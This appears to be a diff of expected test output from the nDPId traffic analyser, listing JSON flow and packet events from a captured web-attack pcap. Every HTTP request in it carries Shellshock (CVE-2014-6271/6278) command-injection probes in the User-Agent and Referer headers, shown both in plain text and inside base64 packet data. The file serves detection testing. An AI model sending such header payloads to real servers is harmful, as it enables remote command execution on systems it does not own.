+01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":479,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277442,"flow_last_seen":1576420277442,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277442,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50520,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ruby.rb","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":480,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277443,"flow_last_seen":1576420277443,"flow_idle_time":7580000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277443,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50522,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00762{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":480,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_packet_id":1,"flow_last_seen":1576420277443,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":277,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":277,"pkt_l4_len":243,"thread_ts_msec":1576420277443,"pkt":"AAAAAAAAAAAAAAAACABFAAEH1YJAAEAGZmx\/AAABfwAAAcVaH5CqXO1RjdaXCYAYAED++wAAAQEICp1m\/eudZv3rR0VUIC9zZWFyY2ggSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="} -01154{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277443,"flow_last_seen":1576420277443,"flow_idle_time":7580000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277443,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50522,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/search","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01154{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277443,"flow_last_seen":1576420277443,"flow_idle_time":7580000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277443,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50522,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/search","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":481,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277444,"flow_last_seen":1576420277444,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277444,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50524,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":481,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_packet_id":1,"flow_last_seen":1576420277444,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277444,"pkt":"AAAAAAAAAAAAAAAACABFAAELsxNAAEAGiNd\/AAABfwAAAcVcH5B0n4vBZle5N4AYAED+\/wAAAQEICp1m\/eydZv3sR0VUIC9zZWFyY2guY2dpIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277444,"flow_last_seen":1576420277444,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277444,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50524,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/search.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277444,"flow_last_seen":1576420277444,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277444,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50524,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/search.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":482,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277446,"flow_last_seen":1576420277446,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277446,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50526,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":482,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_packet_id":1,"flow_last_seen":1576420277446,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277446,"pkt":"AAAAAAAAAAAAAAAACABFAAELQstAAEAG+R9\/AAABfwAAAcVeH5AckXoZTNNhQ4AYAED+\/wAAAQEICp1m\/e6dZv3uR0VUIC9zZXJ2ZXIucGhwIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KDQo="} -01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":482,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277446,"flow_last_seen":1576420277446,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277446,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50526,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/server.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":482,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277446,"flow_last_seen":1576420277446,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277446,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50526,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/server.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":483,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277448,"flow_last_seen":1576420277448,"flow_idle_time":7580000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277448,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50528,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_packet_id":1,"flow_last_seen":1576420277448,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":277,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":277,"pkt_l4_len":243,"thread_ts_msec":1576420277448,"pkt":"AAAAAAAAAAAAAAAACABFAAEHr2pAAEAGjIR\/AAABfwAAAcVgH5ABL5e76\/gzuYAYAED++wAAAQEICp1m\/fCdZv3wR0VUIC9zdGF0dXMgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01154{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":483,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277448,"flow_last_seen":1576420277448,"flow_idle_time":7580000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277448,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50528,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/status","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01154{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":483,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277448,"flow_last_seen":1576420277448,"flow_idle_time":7580000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277448,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50528,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/status","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":484,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277449,"flow_last_seen":1576420277449,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277449,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50530,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_packet_id":1,"flow_last_seen":1576420277449,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277449,"pkt":"AAAAAAAAAAAAAAAACABFAAELeuBAAEAGwQp\/AAABfwAAAcViH5Bf0UINj\/XlzYAYAED+\/wAAAQEICp1m\/fGdZv3xR0VUIC9zeXNpbmZvLnBsIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":484,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277449,"flow_last_seen":1576420277449,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277449,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50530,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/sysinfo.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":484,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277449,"flow_last_seen":1576420277449,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277449,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50530,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/sysinfo.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":485,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277451,"flow_last_seen":1576420277451,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277451,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50532,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_packet_id":1,"flow_last_seen":1576420277451,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1576420277451,"pkt":"AAAAAAAAAAAAAAAACABFAAEFPsFAAEAG\/S9\/AAABfwAAAcVkH5CmDwZuBlGlyYAYAED++QAAAQEICp1m\/fOdZv3zR0VUIC90ZXN0IEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01152{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277451,"flow_last_seen":1576420277451,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277451,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50532,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01152{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277451,"flow_last_seen":1576420277451,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277451,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50532,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277452,"flow_last_seen":1576420277452,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277452,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50534,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_packet_id":1,"flow_last_seen":1576420277452,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277452,"pkt":"AAAAAAAAAAAAAAAACABFAAEJ+UlAAEAGQqN\/AAABfwAAAcVmH5C1jMGV60p+W4AYAED+\/QAAAQEICp1m\/fSdZv30R0VUIC90ZXN0LWNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":486,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277452,"flow_last_seen":1576420277452,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277452,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50534,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test-cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
